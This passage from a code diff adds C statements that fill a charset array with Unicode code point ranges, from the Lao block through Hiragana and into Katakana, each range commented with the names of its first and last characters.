+	c = 0xec8;		// from LAO TONE MAI EK
+	while (c <= 0xecd)	// ..to LAO NIGGAHITA
+		charset[i++] = c++;
+	c = 0xed0;		// from LAO DIGIT ZERO
+	while (c <= 0xed9)	// ..to LAO DIGIT NINE
+		charset[i++] = c++;
+	c = 0xedc;		// from LAO HO NO
+	while (c <= 0xedf)	// ..to LAO LETTER KHMU NYO
+		charset[i++] = c++;
+// 0F00..0FFF; Tibetan
+	c = 0xf00;		// from TIBETAN SYLLABLE OM
+	while (c <= 0xf47)	// ..to TIBETAN LETTER JA
+		charset[i++] = c++;
+	c = 0xf49;		// from TIBETAN LETTER NYA
+	while (c <= 0xf6c)	// ..to TIBETAN LETTER RRA
+		charset[i++] = c++;
+	c = 0xf71;		// from TIBETAN VOWEL SIGN AA
+	while (c <= 0xf97)	// ..to TIBETAN SUBJOINED LETTER JA
+		charset[i++] = c++;
+	c = 0xf99;		// from TIBETAN SUBJOINED LETTER NYA
+	while (c <= 0xfbc)	// ..to TIBETAN SUBJOINED LETTER FIXED-FORM RA
+		charset[i++] = c++;
+	c = 0xfbe;		// from TIBETAN KU RU KHA
+	while (c <= 0xfcc)	// ..to TIBETAN SYMBOL NOR BU BZHI -KHYIL
+		charset[i++] = c++;
+	c = 0xfce;		// from TIBETAN SIGN RDEL NAG RDEL DKAR
+	while (c <= 0xfda)	// ..to TIBETAN MARK TRAILING MCHAN RTAGS
+		charset[i++] = c++;
+// 1000..109F; Myanmar
+	c = 0x1000;		// from MYANMAR LETTER KA
+	while (c <= 0x109f)	// ..to MYANMAR SYMBOL SHAN EXCLAMATION
+		charset[i++] = c++;
+// 10A0..10FF; Georgian
+	c = 0x10a0;		// from GEORGIAN CAPITAL LETTER AN
+	while (c <= 0x10c5)	// ..to GEORGIAN CAPITAL LETTER HOE
+		charset[i++] = c++;
+	c = 0x10d0;		// from GEORGIAN LETTER AN
+	while (c <= 0x10ff)	// ..to GEORGIAN LETTER LABIAL SIGN
+		charset[i++] = c++;
+// 1100..11FF; Hangul Jamo
+	c = 0x1100;		// from HANGUL CHOSEONG KIYEOK
+	while (c <= 0x11ff)	// ..to HANGUL JONGSEONG SSANGNIEUN
+		charset[i++] = c++;
+// 1200..137F; Ethiopic
+	c = 0x1200;		// from ETHIOPIC SYLLABLE HA
+	while (c <= 0x1248)	// ..to ETHIOPIC SYLLABLE QWA
+		charset[i++] = c++;
+	c = 0x124a;		// from ETHIOPIC SYLLABLE QWI
+	while (c <= 0x124d)	// ..to ETHIOPIC SYLLABLE QWE
+		charset[i++] = c++;
+	c = 0x1250;		// from ETHIOPIC SYLLABLE QHA
+	while (c <= 0x1256)	// ..to ETHIOPIC SYLLABLE QHO
+		charset[i++] = c++;
+	c = 0x125a;		// from ETHIOPIC SYLLABLE QHWI
+	while (c <= 0x125d)	// ..to ETHIOPIC SYLLABLE QHWE
+		charset[i++] = c++;
+	c = 0x1260;		// from ETHIOPIC SYLLABLE BA
+	while (c <= 0x1288)	// ..to ETHIOPIC SYLLABLE XWA
+		charset[i++] = c++;
+	c = 0x128a;		// from ETHIOPIC SYLLABLE XWI
+	while (c <= 0x128d)	// ..to ETHIOPIC SYLLABLE XWE
+		charset[i++] = c++;
+	c = 0x1290;		// from ETHIOPIC SYLLABLE NA
+	while (c <= 0x12b0)	// ..to ETHIOPIC SYLLABLE KWA
+		charset[i++] = c++;
+	c = 0x12b2;		// from ETHIOPIC SYLLABLE KWI
+	while (c <= 0x12b5)	// ..to ETHIOPIC SYLLABLE KWE
+		charset[i++] = c++;
+	c = 0x12b8;		// from ETHIOPIC SYLLABLE KXA
+	while (c <= 0x12be)	// ..to ETHIOPIC SYLLABLE KXO
+		charset[i++] = c++;
+	c = 0x12c2;		// from ETHIOPIC SYLLABLE KXWI
+	while (c <= 0x12c5)	// ..to ETHIOPIC SYLLABLE KXWE
+		charset[i++] = c++;
+	c = 0x12c8;		// from ETHIOPIC SYLLABLE WA
+	while (c <= 0x12d6)	// ..to ETHIOPIC SYLLABLE PHARYNGEAL O
+		charset[i++] = c++;
+	c = 0x12d8;		// from ETHIOPIC SYLLABLE ZA
+	while (c <= 0x1310)	// ..to ETHIOPIC SYLLABLE GWA
+		charset[i++] = c++;
+	c = 0x1312;		// from ETHIOPIC SYLLABLE GWI
+	while (c <= 0x1315)	// ..to ETHIOPIC SYLLABLE GWE
+		charset[i++] = c++;
+	c = 0x1318;		// from ETHIOPIC SYLLABLE GGA
+	while (c <= 0x135a)	// ..to ETHIOPIC SYLLABLE FYA
+		charset[i++] = c++;
+	c = 0x135d;		// from ETHIOPIC COMBINING GEMINATION AND VOWEL LENGTH MARK
+	while (c <= 0x137c)	// ..to ETHIOPIC NUMBER TEN THOUSAND
+		charset[i++] = c++;
+// 1380..139F; Ethiopic Supplement
+	c = 0x1380;		// from ETHIOPIC SYLLABLE SEBATBEIT MWA
+	while (c <= 0x1399)	// ..to ETHIOPIC TONAL MARK KURT
+		charset[i++] = c++;
+// 13A0..13FF; Cherokee
+	c = 0x13a0;		// from CHEROKEE LETTER A
+	while (c <= 0x13f5)	// ..to CHEROKEE LETTER MV
+		charset[i++] = c++;
+	c = 0x13f8;		// from CHEROKEE SMALL LETTER YE
+	while (c <= 0x13fd)	// ..to CHEROKEE SMALL LETTER MV
+		charset[i++] = c++;
+// 1400..167F; Unified Canadian Aboriginal Syllabics
+	c = 0x1400;		// from CANADIAN SYLLABICS HYPHEN
+	while (c <= 0x167f)	// ..to CANADIAN SYLLABICS BLACKFOOT W
+		charset[i++] = c++;
+// 1680..169F; Ogham
+	c = 0x1680;		// from OGHAM SPACE MARK
+	while (c <= 0x169c)	// ..to OGHAM REVERSED FEATHER MARK
+		charset[i++] = c++;
+// 16A0..16FF; Runic
+	c = 0x16a0;		// from RUNIC LETTER FEHU FEOH FE F
+	while (c <= 0x16f8)	// ..to RUNIC LETTER FRANKS CASKET AESC
+		charset[i++] = c++;
+// 1700..171F; Tagalog
+	c = 0x1700;		// from TAGALOG LETTER A
+	while (c <= 0x170c)	// ..to TAGALOG LETTER YA
+		charset[i++] = c++;
+	c = 0x170e;		// from TAGALOG LETTER LA
+	while (c <= 0x1714)	// ..to TAGALOG SIGN VIRAMA
+		charset[i++] = c++;
+// 1720..173F; Hanunoo
+	c = 0x1720;		// from HANUNOO LETTER A
+	while (c <= 0x1736)	// ..to PHILIPPINE DOUBLE PUNCTUATION
+		charset[i++] = c++;
+// 1740..175F; Buhid
+	c = 0x1740;		// from BUHID LETTER A
+	while (c <= 0x1753)	// ..to BUHID VOWEL SIGN U
+		charset[i++] = c++;
+// 1760..177F; Tagbanwa
+	c = 0x1760;		// from TAGBANWA LETTER A
+	while (c <= 0x176c)	// ..to TAGBANWA LETTER YA
+		charset[i++] = c++;
+	charset[i++] = 0x176e;	// TAGBANWA LETTER LA
+	charset[i++] = 0x1770;	// TAGBANWA LETTER SA
+	charset[i++] = 0x1772;	// TAGBANWA VOWEL SIGN I
+	charset[i++] = 0x1773;	// TAGBANWA VOWEL SIGN U
+// 1780..17FF; Khmer
+	c = 0x1780;		// from KHMER LETTER KA
+	while (c <= 0x17dd)	// ..to KHMER SIGN ATTHACAN
+		charset[i++] = c++;
+	c = 0x17e0;		// from KHMER DIGIT ZERO
+	while (c <= 0x17e9)	// ..to KHMER DIGIT NINE
+		charset[i++] = c++;
+	c = 0x17f0;		// from KHMER SYMBOL LEK ATTAK SON
+	while (c <= 0x17f9)	// ..to KHMER SYMBOL LEK ATTAK PRAM-BUON
+		charset[i++] = c++;
+// 1800..18AF; Mongolian
+	c = 0x1800;		// from MONGOLIAN BIRGA
+	while (c <= 0x180e)	// ..to MONGOLIAN VOWEL SEPARATOR
+		charset[i++] = c++;
+	c = 0x1810;		// from MONGOLIAN DIGIT ZERO
+	while (c <= 0x1819)	// ..to MONGOLIAN DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1820;		// from MONGOLIAN LETTER A
+	while (c <= 0x1878)	// ..to MONGOLIAN LETTER CHA WITH TWO DOTS
+		charset[i++] = c++;
+	c = 0x1880;		// from MONGOLIAN LETTER ALI GALI ANUSVARA ONE
+	while (c <= 0x18aa)	// ..to MONGOLIAN LETTER MANCHU ALI GALI LHA
+		charset[i++] = c++;
+// 18B0..18FF; Unified Canadian Aboriginal Syllabics Extended
+	c = 0x18b0;		// from CANADIAN SYLLABICS OY
+	while (c <= 0x18f5)	// ..to CANADIAN SYLLABICS CARRIER DENTAL S
+		charset[i++] = c++;
+// 1900..194F; Limbu
+	c = 0x1900;		// from LIMBU VOWEL-CARRIER LETTER
+	while (c <= 0x191e)	// ..to LIMBU LETTER TRA
+		charset[i++] = c++;
+	c = 0x1920;		// from LIMBU VOWEL SIGN A
+	while (c <= 0x192b)	// ..to LIMBU SUBJOINED LETTER WA
+		charset[i++] = c++;
+	c = 0x1930;		// from LIMBU SMALL LETTER KA
+	while (c <= 0x193b)	// ..to LIMBU SIGN SA-I
+		charset[i++] = c++;
+	c = 0x1944;		// from LIMBU EXCLAMATION MARK
+	while (c <= 0x194f)	// ..to LIMBU DIGIT NINE
+		charset[i++] = c++;
+// 1950..197F; Tai Le
+	c = 0x1950;		// from TAI LE LETTER KA
+	while (c <= 0x196d)	// ..to TAI LE LETTER AI
+		charset[i++] = c++;
+	c = 0x1970;		// from TAI LE LETTER TONE-2
+	while (c <= 0x1974)	// ..to TAI LE LETTER TONE-6
+		charset[i++] = c++;
+// 1980..19DF; New Tai Lue
+	c = 0x1980;		// from NEW TAI LUE LETTER HIGH QA
+	while (c <= 0x19ab)	// ..to NEW TAI LUE LETTER LOW SUA
+		charset[i++] = c++;
+	c = 0x19b0;		// from NEW TAI LUE VOWEL SIGN VOWEL SHORTENER
+	while (c <= 0x19c9)	// ..to NEW TAI LUE TONE MARK-2
+		charset[i++] = c++;
+	c = 0x19d0;		// from NEW TAI LUE DIGIT ZERO
+	while (c <= 0x19da)	// ..to NEW TAI LUE THAM DIGIT ONE
+		charset[i++] = c++;
+	charset[i++] = 0x19de;	// NEW TAI LUE SIGN LAE
+	charset[i++] = 0x19df;	// NEW TAI LUE SIGN LAEV
+// 19E0..19FF; Khmer Symbols
+	c = 0x19e0;		// from KHMER SYMBOL PATHAMASAT
+	while (c <= 0x19ff)	// ..to KHMER SYMBOL DAP-PRAM ROC
+		charset[i++] = c++;
+// 1A00..1A1F; Buginese
+	c = 0x1a00;		// from BUGINESE LETTER KA
+	while (c <= 0x1a1b)	// ..to BUGINESE VOWEL SIGN AE
+		charset[i++] = c++;
+	charset[i++] = 0x1a1e;	// BUGINESE PALLAWA
+	charset[i++] = 0x1a1f;	// BUGINESE END OF SECTION
+// 1A20..1AAF; Tai Tham
+	c = 0x1a20;		// from TAI THAM LETTER HIGH KA
+	while (c <= 0x1a5e)	// ..to TAI THAM CONSONANT SIGN SA
+		charset[i++] = c++;
+	c = 0x1a60;		// from TAI THAM SIGN SAKOT
+	while (c <= 0x1a7c)	// ..to TAI THAM SIGN KHUEN-LUE KARAN
+		charset[i++] = c++;
+	c = 0x1a7f;		// from TAI THAM COMBINING CRYPTOGRAMMIC DOT
+	while (c <= 0x1a89)	// ..to TAI THAM HORA DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1a90;		// from TAI THAM THAM DIGIT ZERO
+	while (c <= 0x1a99)	// ..to TAI THAM THAM DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1aa0;		// from TAI THAM SIGN WIANG
+	while (c <= 0x1aad)	// ..to TAI THAM SIGN CAANG
+		charset[i++] = c++;
+// 1AB0..1AFF; Combining Diacritical Marks Extended
+	c = 0x1ab0;		// from COMBINING DOUBLED CIRCUMFLEX ACCENT
+	while (c <= 0x1abe)	// ..to COMBINING PARENTHESES OVERLAY
+		charset[i++] = c++;
+// 1B00..1B7F; Balinese
+	c = 0x1b00;		// from BALINESE SIGN ULU RICEM
+	while (c <= 0x1b4b)	// ..to BALINESE LETTER ASYURA SASAK
+		charset[i++] = c++;
+	c = 0x1b50;		// from BALINESE DIGIT ZERO
+	while (c <= 0x1b7c)	// ..to BALINESE MUSICAL SYMBOL LEFT-HAND OPEN PING
+		charset[i++] = c++;
+// 1B80..1BBF; Sundanese
+	c = 0x1b80;		// from SUNDANESE SIGN PANYECEK
+	while (c <= 0x1bbf)	// ..to SUNDANESE LETTER FINAL M
+		charset[i++] = c++;
+// 1BC0..1BFF; Batak
+	c = 0x1bc0;		// from BATAK LETTER A
+	while (c <= 0x1bf3)	// ..to BATAK PANONGONAN
+		charset[i++] = c++;
+	c = 0x1bfc;		// from BATAK SYMBOL BINDU NA METEK
+	while (c <= 0x1bff)	// ..to BATAK SYMBOL BINDU PANGOLAT
+		charset[i++] = c++;
+// 1C00..1C4F; Lepcha
+	c = 0x1c00;		// from LEPCHA LETTER KA
+	while (c <= 0x1c37)	// ..to LEPCHA SIGN NUKTA
+		charset[i++] = c++;
+	c = 0x1c3b;		// from LEPCHA PUNCTUATION TA-ROL
+	while (c <= 0x1c49)	// ..to LEPCHA DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1c4d;	// LEPCHA LETTER TTA
+	charset[i++] = 0x1c4f;	// LEPCHA LETTER DDA
+// 1C50..1C7F; Ol Chiki
+	c = 0x1c50;		// from OL CHIKI DIGIT ZERO
+	while (c <= 0x1c7f)	// ..to OL CHIKI PUNCTUATION DOUBLE MUCAAD
+		charset[i++] = c++;
+// 1C80..1C8F; Cyrillic Extended-C
+	c = 0x1c80;		// from CYRILLIC SMALL LETTER ROUNDED VE
+	while (c <= 0x1c88)	// ..to CYRILLIC SMALL LETTER UNBLENDED UK
+		charset[i++] = c++;
+// 1C90..1CBF; Georgian Extended
+	c = 0x1c90;		// from GEORGIAN MTAVRULI CAPITAL LETTER AN
+	while (c <= 0x1cba)	// ..to GEORGIAN MTAVRULI CAPITAL LETTER AIN
+		charset[i++] = c++;
+	charset[i++] = 0x1cbd;	// GEORGIAN MTAVRULI CAPITAL LETTER AEN
+	charset[i++] = 0x1cbf;	// GEORGIAN MTAVRULI CAPITAL LETTER LABIAL SIGN
+// 1CC0..1CCF; Sundanese Supplement
+	c = 0x1cc0;		// from SUNDANESE PUNCTUATION BINDU SURYA
+	while (c <= 0x1cc7)	// ..to SUNDANESE PUNCTUATION BINDU BA SATANGA
+		charset[i++] = c++;
+// 1CD0..1CFF; Vedic Extensions
+	c = 0x1cd0;		// from VEDIC TONE KARSHANA
+	while (c <= 0x1cf9)	// ..to VEDIC TONE DOUBLE RING ABOVE
+		charset[i++] = c++;
+// 1D00..1D7F; Phonetic Extensions
+	c = 0x1d00;		// from LATIN LETTER SMALL CAPITAL A
+	while (c <= 0x1d7f)	// ..to LATIN SMALL LETTER UPSILON WITH STROKE
+		charset[i++] = c++;
+// 1D80..1DBF; Phonetic Extensions Supplement
+	c = 0x1d80;		// from LATIN SMALL LETTER B WITH PALATAL HOOK
+	while (c <= 0x1dbf)	// ..to MODIFIER LETTER SMALL THETA
+		charset[i++] = c++;
+// 1DC0..1DFF; Combining Diacritical Marks Supplement
+	c = 0x1dc0;		// from COMBINING DOTTED GRAVE ACCENT
+	while (c <= 0x1df9)	// ..to COMBINING WIDE INVERTED BRIDGE BELOW
+		charset[i++] = c++;
+	c = 0x1dfb;		// from COMBINING DELETION MARK
+	while (c <= 0x1dff)	// ..to COMBINING RIGHT ARROWHEAD AND DOWN ARROWHEAD BELOW
+		charset[i++] = c++;
+// 1E00..1EFF; Latin Extended Additional
+	c = 0x1e00;		// from LATIN CAPITAL LETTER A WITH RING BELOW
+	while (c <= 0x1eff)	// ..to LATIN SMALL LETTER Y WITH LOOP
+		charset[i++] = c++;
+// 1F00..1FFF; Greek Extended
+	c = 0x1f00;		// from GREEK SMALL LETTER ALPHA WITH PSILI
+	while (c <= 0x1f15)	// ..to GREEK SMALL LETTER EPSILON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f18;		// from GREEK CAPITAL LETTER EPSILON WITH PSILI
+	while (c <= 0x1f1d)	// ..to GREEK CAPITAL LETTER EPSILON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f20;		// from GREEK SMALL LETTER ETA WITH PSILI
+	while (c <= 0x1f45)	// ..to GREEK SMALL LETTER OMICRON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f48;		// from GREEK CAPITAL LETTER OMICRON WITH PSILI
+	while (c <= 0x1f4d)	// ..to GREEK CAPITAL LETTER OMICRON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f50;		// from GREEK SMALL LETTER UPSILON WITH PSILI
+	while (c <= 0x1f57)	// ..to GREEK SMALL LETTER UPSILON WITH DASIA AND PERISPOMENI
+		charset[i++] = c++;
+	c = 0x1f5f;		// from GREEK CAPITAL LETTER UPSILON WITH DASIA AND PERISPOMENI
+	while (c <= 0x1f7d)	// ..to GREEK SMALL LETTER OMEGA WITH OXIA
+		charset[i++] = c++;
+	c = 0x1f80;		// from GREEK SMALL LETTER ALPHA WITH PSILI AND YPOGEGRAMMENI
+	while (c <= 0x1fb4)	// ..to GREEK SMALL LETTER ALPHA WITH OXIA AND YPOGEGRAMMENI
+		charset[i++] = c++;
+	c = 0x1fb6;		// from GREEK SMALL LETTER ALPHA WITH PERISPOMENI
+	while (c <= 0x1fc4)	// ..to GREEK SMALL LETTER ETA WITH OXIA AND YPOGEGRAMMENI
+		charset[i++] = c++;
+	c = 0x1fc6;		// from GREEK SMALL LETTER ETA WITH PERISPOMENI
+	while (c <= 0x1fd3)	// ..to GREEK SMALL LETTER IOTA WITH DIALYTIKA AND OXIA
+		charset[i++] = c++;
+	c = 0x1fd6;		// from GREEK SMALL LETTER IOTA WITH PERISPOMENI
+	while (c <= 0x1fdb)	// ..to GREEK CAPITAL LETTER IOTA WITH OXIA
+		charset[i++] = c++;
+	c = 0x1fdd;		// from GREEK DASIA AND VARIA
+	while (c <= 0x1fef)	// ..to GREEK VARIA
+		charset[i++] = c++;
+	charset[i++] = 0x1ff2;	// GREEK SMALL LETTER OMEGA WITH VARIA AND YPOGEGRAMMENI
+	charset[i++] = 0x1ff4;	// GREEK SMALL LETTER OMEGA WITH OXIA AND YPOGEGRAMMENI
+	c = 0x1ff6;		// from GREEK SMALL LETTER OMEGA WITH PERISPOMENI
+	while (c <= 0x1ffe)	// ..to GREEK DASIA
+		charset[i++] = c++;
+// 2000..206F; General Punctuation
+	c = 0x2000;		// from EN QUAD
+	while (c <= 0x2064)	// ..to INVISIBLE PLUS
+		charset[i++] = c++;
+	c = 0x2066;		// from LEFT-TO-RIGHT ISOLATE
+	while (c <= 0x206f)	// ..to NOMINAL DIGIT SHAPES
+		charset[i++] = c++;
+// 2070..209F; Superscripts and Subscripts
+	charset[i++] = 0x2070;	// SUPERSCRIPT ZERO
+	charset[i++] = 0x2071;	// SUPERSCRIPT LATIN SMALL LETTER I
+	c = 0x2074;		// from SUPERSCRIPT FOUR
+	while (c <= 0x208e)	// ..to SUBSCRIPT RIGHT PARENTHESIS
+		charset[i++] = c++;
+	c = 0x2090;		// from LATIN SUBSCRIPT SMALL LETTER A
+	while (c <= 0x209c)	// ..to LATIN SUBSCRIPT SMALL LETTER T
+		charset[i++] = c++;
+// 20A0..20CF; Currency Symbols
+	c = 0x20a0;		// from EURO-CURRENCY SIGN
+	while (c <= 0x20bf)	// ..to BITCOIN SIGN
+		charset[i++] = c++;
+// 20D0..20FF; Combining Diacritical Marks for Symbols
+	c = 0x20d0;		// from COMBINING LEFT HARPOON ABOVE
+	while (c <= 0x20f0)	// ..to COMBINING ASTERISK ABOVE
+		charset[i++] = c++;
+// 2100..214F; Letterlike Symbols
+	c = 0x2100;		// from ACCOUNT OF
+	while (c <= 0x214f)	// ..to SYMBOL FOR SAMARITAN SOURCE
+		charset[i++] = c++;
+// 2150..218F; Number Forms
+	c = 0x2150;		// from VULGAR FRACTION ONE SEVENTH
+	while (c <= 0x218b)	// ..to TURNED DIGIT THREE
+		charset[i++] = c++;
+// 2190..21FF; Arrows
+	c = 0x2190;		// from LEFTWARDS ARROW
+	while (c <= 0x21ff)	// ..to LEFT RIGHT OPEN-HEADED ARROW
+		charset[i++] = c++;
+// 2200..22FF; Mathematical Operators
+	c = 0x2200;		// from FOR ALL
+	while (c <= 0x22ff)	// ..to Z NOTATION BAG MEMBERSHIP
+		charset[i++] = c++;
+// 2300..23FF; Miscellaneous Technical
+	c = 0x2300;		// from DIAMETER SIGN
+	while (c <= 0x23ff)	// ..to OBSERVER EYE SYMBOL
+		charset[i++] = c++;
+// 2400..243F; Control Pictures
+	c = 0x2400;		// from SYMBOL FOR NULL
+	while (c <= 0x2426)	// ..to SYMBOL FOR SUBSTITUTE FORM TWO
+		charset[i++] = c++;
+// 2440..245F; Optical Character Recognition
+	c = 0x2440;		// from OCR HOOK
+	while (c <= 0x244a)	// ..to OCR DOUBLE BACKSLASH
+		charset[i++] = c++;
+// 2460..24FF; Enclosed Alphanumerics
+	c = 0x2460;		// from CIRCLED DIGIT ONE
+	while (c <= 0x24ff)	// ..to NEGATIVE CIRCLED DIGIT ZERO
+		charset[i++] = c++;
+// 2500..257F; Box Drawing
+	c = 0x2500;		// from BOX DRAWINGS LIGHT HORIZONTAL
+	while (c <= 0x257f)	// ..to BOX DRAWINGS HEAVY UP AND LIGHT DOWN
+		charset[i++] = c++;
+// 2580..259F; Block Elements
+	c = 0x2580;		// from UPPER HALF BLOCK
+	while (c <= 0x259f)	// ..to QUADRANT UPPER RIGHT AND LOWER LEFT AND LOWER RIGHT
+		charset[i++] = c++;
+// 25A0..25FF; Geometric Shapes
+	c = 0x25a0;		// from BLACK SQUARE
+	while (c <= 0x25ff)	// ..to LOWER RIGHT TRIANGLE
+		charset[i++] = c++;
+// 2600..26FF; Miscellaneous Symbols
+	c = 0x2600;		// from BLACK SUN WITH RAYS
+	while (c <= 0x26ff)	// ..to WHITE FLAG WITH HORIZONTAL MIDDLE BLACK STRIPE
+		charset[i++] = c++;
+// 2700..27BF; Dingbats
+	c = 0x2700;		// from BLACK SAFETY SCISSORS
+	while (c <= 0x27bf)	// ..to DOUBLE CURLY LOOP
+		charset[i++] = c++;
+// 27C0..27EF; Miscellaneous Mathematical Symbols-A
+	c = 0x27c0;		// from THREE DIMENSIONAL ANGLE
+	while (c <= 0x27ef)	// ..to MATHEMATICAL RIGHT FLATTENED PARENTHESIS
+		charset[i++] = c++;
+// 27F0..27FF; Supplemental Arrows-A
+	c = 0x27f0;		// from UPWARDS QUADRUPLE ARROW
+	while (c <= 0x27ff)	// ..to LONG RIGHTWARDS SQUIGGLE ARROW
+		charset[i++] = c++;
+// 2800..28FF; Braille Patterns
+	c = 0x2800;		// from BRAILLE PATTERN BLANK
+	while (c <= 0x28ff)	// ..to BRAILLE PATTERN DOTS-12345678
+		charset[i++] = c++;
+// 2900..297F; Supplemental Arrows-B
+	c = 0x2900;		// from RIGHTWARDS TWO-HEADED ARROW WITH VERTICAL STROKE
+	while (c <= 0x297f)	// ..to DOWN FISH TAIL
+		charset[i++] = c++;
+// 2980..29FF; Miscellaneous Mathematical Symbols-B
+	c = 0x2980;		// from TRIPLE VERTICAL BAR DELIMITER
+	while (c <= 0x29ff)	// ..to MINY
+		charset[i++] = c++;
+// 2A00..2AFF; Supplemental Mathematical Operators
+	c = 0x2a00;		// from N-ARY CIRCLED DOT OPERATOR
+	while (c <= 0x2aff)	// ..to N-ARY WHITE VERTICAL BAR
+		charset[i++] = c++;
+// 2B00..2BFF; Miscellaneous Symbols and Arrows
+	c = 0x2b00;		// from NORTH EAST WHITE ARROW
+	while (c <= 0x2b73)	// ..to DOWNWARDS TRIANGLE-HEADED ARROW TO BAR
+		charset[i++] = c++;
+	c = 0x2b76;		// from NORTH WEST TRIANGLE-HEADED ARROW TO BAR
+	while (c <= 0x2b95)	// ..to RIGHTWARDS BLACK ARROW
+		charset[i++] = c++;
+	c = 0x2b98;		// from THREE-D TOP-LIGHTED LEFTWARDS EQUILATERAL ARROWHEAD
+	while (c <= 0x2bc8)	// ..to BLACK MEDIUM RIGHT-POINTING TRIANGLE CENTRED
+		charset[i++] = c++;
+	c = 0x2bca;		// from TOP HALF BLACK CIRCLE
+	while (c <= 0x2bfe)	// ..to REVERSED RIGHT ANGLE
+		charset[i++] = c++;
+// 2C00..2C5F; Glagolitic
+	c = 0x2c00;		// from GLAGOLITIC CAPITAL LETTER AZU
+	while (c <= 0x2c2e)	// ..to GLAGOLITIC CAPITAL LETTER LATINATE MYSLITE
+		charset[i++] = c++;
+	c = 0x2c30;		// from GLAGOLITIC SMALL LETTER AZU
+	while (c <= 0x2c5e)	// ..to GLAGOLITIC SMALL LETTER LATINATE MYSLITE
+		charset[i++] = c++;
+// 2C60..2C7F; Latin Extended-C
+	c = 0x2c60;		// from LATIN CAPITAL LETTER L WITH DOUBLE BAR
+	while (c <= 0x2c7f)	// ..to LATIN CAPITAL LETTER Z WITH SWASH TAIL
+		charset[i++] = c++;
+// 2C80..2CFF; Coptic
+	c = 0x2c80;		// from COPTIC CAPITAL LETTER ALFA
+	while (c <= 0x2cf3)	// ..to COPTIC SMALL LETTER BOHAIRIC KHEI
+		charset[i++] = c++;
+	c = 0x2cf9;		// from COPTIC OLD NUBIAN FULL STOP
+	while (c <= 0x2cff)	// ..to COPTIC MORPHOLOGICAL DIVIDER
+		charset[i++] = c++;
+// 2D00..2D2F; Georgian Supplement
+	c = 0x2d00;		// from GEORGIAN SMALL LETTER AN
+	while (c <= 0x2d25)	// ..to GEORGIAN SMALL LETTER HOE
+		charset[i++] = c++;
+	c = 0x2d27;		// from GEORGIAN SMALL LETTER YN
+	while (c <= 0x2d2d)	// ..to GEORGIAN SMALL LETTER AEN
+		charset[i++] = c++;
+// 2D30..2D7F; Tifinagh
+	c = 0x2d30;		// from TIFINAGH LETTER YA
+	while (c <= 0x2d67)	// ..to TIFINAGH LETTER YO
+		charset[i++] = c++;
+	charset[i++] = 0x2d6f;	// TIFINAGH MODIFIER LETTER LABIALIZATION MARK
+	charset[i++] = 0x2d70;	// TIFINAGH SEPARATOR MARK
+	charset[i++] = 0x2d7f;	// TIFINAGH CONSONANT JOINER
+// 2D80..2DDF; Ethiopic Extended
+	c = 0x2d80;		// from ETHIOPIC SYLLABLE LOA
+	while (c <= 0x2d96)	// ..to ETHIOPIC SYLLABLE GGWE
+		charset[i++] = c++;
+	c = 0x2da0;		// from ETHIOPIC SYLLABLE SSA
+	while (c <= 0x2da6)	// ..to ETHIOPIC SYLLABLE SSO
+		charset[i++] = c++;
+	c = 0x2da8;		// from ETHIOPIC SYLLABLE CCA
+	while (c <= 0x2dae)	// ..to ETHIOPIC SYLLABLE CCO
+		charset[i++] = c++;
+	c = 0x2db0;		// from ETHIOPIC SYLLABLE ZZA
+	while (c <= 0x2db6)	// ..to ETHIOPIC SYLLABLE ZZO
+		charset[i++] = c++;
+	c = 0x2db8;		// from ETHIOPIC SYLLABLE CCHA
+	while (c <= 0x2dbe)	// ..to ETHIOPIC SYLLABLE CCHO
+		charset[i++] = c++;
+	c = 0x2dc0;		// from ETHIOPIC SYLLABLE QYA
+	while (c <= 0x2dc6)	// ..to ETHIOPIC SYLLABLE QYO
+		charset[i++] = c++;
+	c = 0x2dc8;		// from ETHIOPIC SYLLABLE KYA
+	while (c <= 0x2dce)	// ..to ETHIOPIC SYLLABLE KYO
+		charset[i++] = c++;
+	c = 0x2dd0;		// from ETHIOPIC SYLLABLE XYA
+	while (c <= 0x2dd6)	// ..to ETHIOPIC SYLLABLE XYO
+		charset[i++] = c++;
+	c = 0x2dd8;		// from ETHIOPIC SYLLABLE GYA
+	while (c <= 0x2dde)	// ..to ETHIOPIC SYLLABLE GYO
+		charset[i++] = c++;
+// 2DE0..2DFF; Cyrillic Extended-A
+	c = 0x2de0;		// from COMBINING CYRILLIC LETTER BE
+	while (c <= 0x2dff)	// ..to COMBINING CYRILLIC LETTER IOTIFIED BIG YUS
+		charset[i++] = c++;
+// 2E00..2E7F; Supplemental Punctuation
+	c = 0x2e00;		// from RIGHT ANGLE SUBSTITUTION MARKER
+	while (c <= 0x2e4e)	// ..to PUNCTUS ELEVATUS MARK
+		charset[i++] = c++;
+// 2E80..2EFF; CJK Radicals Supplement
+	c = 0x2e80;		// from CJK RADICAL REPEAT
+	while (c <= 0x2e99)	// ..to CJK RADICAL RAP
+		charset[i++] = c++;
+	c = 0x2e9b;		// from CJK RADICAL CHOKE
+	while (c <= 0x2ef3)	// ..to CJK RADICAL C-SIMPLIFIED TURTLE
+		charset[i++] = c++;
+// 2F00..2FDF; Kangxi Radicals
+	c = 0x2f00;		// from KANGXI RADICAL ONE
+	while (c <= 0x2fd5)	// ..to KANGXI RADICAL FLUTE
+		charset[i++] = c++;
+// 2FF0..2FFF; Ideographic Description Characters
+	c = 0x2ff0;		// from IDEOGRAPHIC DESCRIPTION CHARACTER LEFT TO RIGHT
+	while (c <= 0x2ffb)	// ..to IDEOGRAPHIC DESCRIPTION CHARACTER OVERLAID
+		charset[i++] = c++;
+// 3000..303F; CJK Symbols and Punctuation
+	c = 0x3000;		// from IDEOGRAPHIC SPACE
+	while (c <= 0x303f)	// ..to IDEOGRAPHIC HALF FILL SPACE
+		charset[i++] = c++;
+// 3040..309F; Hiragana
+	c = 0x3041;		// from HIRAGANA LETTER SMALL A
+	while (c <= 0x3096)	// ..to HIRAGANA LETTER SMALL KE
+		charset[i++] = c++;
+	c = 0x3099;		// from COMBINING KATAKANA-HIRAGANA VOICED SOUND MARK
+	while (c <= 0x309f)	// ..to HIRAGANA DIGRAPH YORI
+		charset[i++] = c++;
+// 30A0..30FF; Katakana
+	c = 0x30a0;		// from KATAKANA-HIRAGANA DOUBLE HYPHEN
